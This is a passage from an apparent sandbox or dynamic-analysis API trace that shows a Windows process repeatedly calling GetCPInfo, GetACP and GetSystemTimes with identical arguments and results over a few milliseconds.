lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.345] GetACP () returned 0x4e4 [0167.345] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.345] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.345] GetACP () returned 0x4e4 [0167.345] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.345] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.345] GetACP () returned 0x4e4 [0167.345] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.345] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.345] GetACP () returned 0x4e4 [0167.345] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.345] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.345] GetACP () returned 0x4e4 [0167.345] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.345] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.345] GetACP () returned 0x4e4 [0167.345] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.345] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.345] GetACP () returned 0x4e4 [0167.345] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.346] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.346] GetACP () returned 0x4e4 [0167.346] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.346] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.346] GetACP () returned 0x4e4 [0167.346] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.346] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.346] GetACP () returned 0x4e4 [0167.346] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.346] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.346] GetACP () returned 0x4e4 [0167.346] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.346] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.346] GetACP () returned 0x4e4 [0167.346] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.346] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.346] GetACP () returned 0x4e4 [0167.346] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.346] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.346] GetACP () returned 0x4e4 [0167.346] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.346] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.346] GetACP () returned 0x4e4 [0167.346] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.347] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.347] GetACP () returned 0x4e4 [0167.347] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.347] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.347] GetACP () returned 0x4e4 [0167.347] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.347] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.347] GetACP () returned 0x4e4 [0167.347] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.347] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.347] GetACP () returned 0x4e4 [0167.347] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.347] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.347] GetACP () returned 0x4e4 [0167.347] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.347] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.347] GetACP () returned 0x4e4 [0167.347] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.347] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.347] GetACP () returned 0x4e4 [0167.347] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.347] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.347] GetACP () returned 0x4e4 [0167.347] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.347] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.347] GetACP () returned 0x4e4 [0167.348] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.348] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.348] GetACP () returned 0x4e4 [0167.348] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.348] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.348] GetACP () returned 0x4e4 [0167.348] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.348] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.348] GetACP () returned 0x4e4 [0167.348] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.348] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.348] GetACP () returned 0x4e4 [0167.348] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.348] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.348] GetACP () returned 0x4e4 [0167.348] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.348] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.348] GetACP () returned 0x4e4 [0167.348] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.348] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.348] GetACP () returned 0x4e4 [0167.348] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.348] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.349] GetACP () returned 0x4e4 [0167.349] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.349] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.349] GetACP () returned 0x4e4 [0167.349] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.349] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.349] GetACP () returned 0x4e4 [0167.349] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.349] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.349] GetACP () returned 0x4e4 [0167.349] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.349] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.349] GetACP () returned 0x4e4 [0167.349] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.349] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.349] GetACP () returned 0x4e4 [0167.349] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.349] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.349] GetACP () returned 0x4e4 [0167.349] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.349] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.349] GetACP () returned 0x4e4 [0167.349] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.349] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.350] GetACP () returned 0x4e4 [0167.350] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.350] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.350] GetACP () returned 0x4e4 [0167.350] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.350] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.350] GetACP () returned 0x4e4 [0167.350] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.350] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.350] GetACP () returned 0x4e4 [0167.350] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.350] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.350] GetACP () returned 0x4e4 [0167.350] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.350] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.350] GetACP () returned 0x4e4 [0167.350] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.350] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.350] GetACP () returned 0x4e4 [0167.350] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.350] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.350] GetACP () returned 0x4e4 [0167.350] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.350] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.351] GetACP () returned 0x4e4 [0167.351] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.351] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.351] GetACP () returned 0x4e4 [0167.351] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.351] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.351] GetACP () returned 0x4e4 [0167.351] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.351] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.351] GetACP () returned 0x4e4 [0167.351] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.351] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.351] GetACP () returned 0x4e4 [0167.351] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.351] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.351] GetACP () returned 0x4e4 [0167.351] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.351] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.351] GetACP () returned 0x4e4 [0167.351] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.351] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.351] GetACP () returned 0x4e4 [0167.352] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.352] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.352] GetACP () returned 0x4e4 [0167.352] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.352] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.352] GetACP () returned 0x4e4 [0167.352] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.352] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.352] GetACP () returned 0x4e4 [0167.352] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.352] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.352] GetACP () returned 0x4e4 [0167.352] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.352] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.352] GetACP () returned 0x4e4 [0167.352] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.352] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.352] GetACP () returned 0x4e4 [0167.352] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.352] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.353] GetACP () returned 0x4e4 [0167.353] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.353] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.353] GetACP () returned 0x4e4 [0167.353] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.353] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.353] GetACP () returned 0x4e4 [0167.353] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.353] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.353] GetACP () returned 0x4e4 [0167.353] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.353] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.353] GetACP () returned 0x4e4 [0167.353] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.353] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.353] GetACP () returned 0x4e4 [0167.353] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.354] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.354] GetACP () returned 0x4e4 [0167.354] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.354] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.354] GetACP () returned 0x4e4 [0167.354] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.354] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.354] GetACP () returned 0x4e4 [0167.354] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.354] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.354] GetACP () returned 0x4e4 [0167.354] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.354] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.354] GetACP () returned 0x4e4 [0167.354] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.354] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.354] GetACP () returned 0x4e4 [0167.354] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.354] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.354] GetACP () returned 0x4e4 [0167.354] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.354] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.354] GetACP () returned 0x4e4 [0167.354] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.355] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.355] GetACP () returned 0x4e4 [0167.355] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0167.355] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0167.355] GetACP () returned 0x4e4 [0167.355] GetSystemTimes (in: lpIdleTime=0x18fa70, 